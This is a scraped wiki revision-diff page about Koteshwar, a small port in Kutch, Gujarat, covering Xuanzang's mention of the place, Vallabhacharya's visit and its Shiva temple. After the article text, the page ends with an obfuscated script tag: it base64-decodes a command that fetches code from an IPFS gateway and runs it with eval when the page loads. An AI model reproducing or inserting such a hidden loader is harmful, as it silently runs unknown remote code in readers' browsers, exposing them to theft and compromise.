Difference between revisions of "कोटेश्वर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''कोटेश्वर''' [[गुजरात]] के [[कच्छ ज़िला|कच्छ ज़िले]] में स्थित एक छोटा-सी बन्दरगाह है।  
 
'''कोटेश्वर''' [[गुजरात]] के [[कच्छ ज़िला|कच्छ ज़िले]] में स्थित एक छोटा-सी बन्दरगाह है।  
 
*[[युवानच्वांग]] के यात्रा वृतांत में जिस 'ए-शिफाली' नगर का उल्लेख कच्छ की राजधानी के रूप में हुआ है।  
 
*[[युवानच्वांग]] के यात्रा वृतांत में जिस 'ए-शिफाली' नगर का उल्लेख कच्छ की राजधानी के रूप में हुआ है।  
*सम्भवतः वह कोटेश्वर नामक वर्तमान स्थान ही है। अति प्राचीन तीर्थस्थल नारायणसर यहाँ से दो मील की दूरी पर स्थित है।  
+
*सम्भवतः वह कोटेश्वर नामक वर्तमान स्थान ही है। अति प्राचीन तीर्थस्थल [[नारायणसर]] यहाँ से दो मील की दूरी पर स्थित है।  
 
*[[वल्लभाचार्य|महाप्रभु वल्लभाचार्य]] इस स्थल पर 16वीं शताब्दी में आये थे।  
 
*[[वल्लभाचार्य|महाप्रभु वल्लभाचार्य]] इस स्थल पर 16वीं शताब्दी में आये थे।  
 
*कोटेश्वर में कोटेश्वर नामक शिवमन्दिर भी है।  
 
*कोटेश्वर में कोटेश्वर नामक शिवमन्दिर भी है।  
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{गुजरात के ऐतिहासिक स्थान}}
 
{{गुजरात के ऐतिहासिक स्थान}}

Revision as of 13:27, 16 July 2012

koteshvar gujarat ke kachchh zile mean sthit ek chhota-si bandaragah hai.

  • yuvanachvaang ke yatra vritaant mean jis 'e-shiphali' nagar ka ullekh kachchh ki rajadhani ke roop mean hua hai.
  • sambhavatah vah koteshvar namak vartaman sthan hi hai. ati prachin tirthasthal narayanasar yahaan se do mil ki doori par sthit hai.
  • mahaprabhu vallabhachary is sthal par 16vian shatabdi mean aye the.
  • koteshvar mean koteshvar namak shivamandir bhi hai.

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>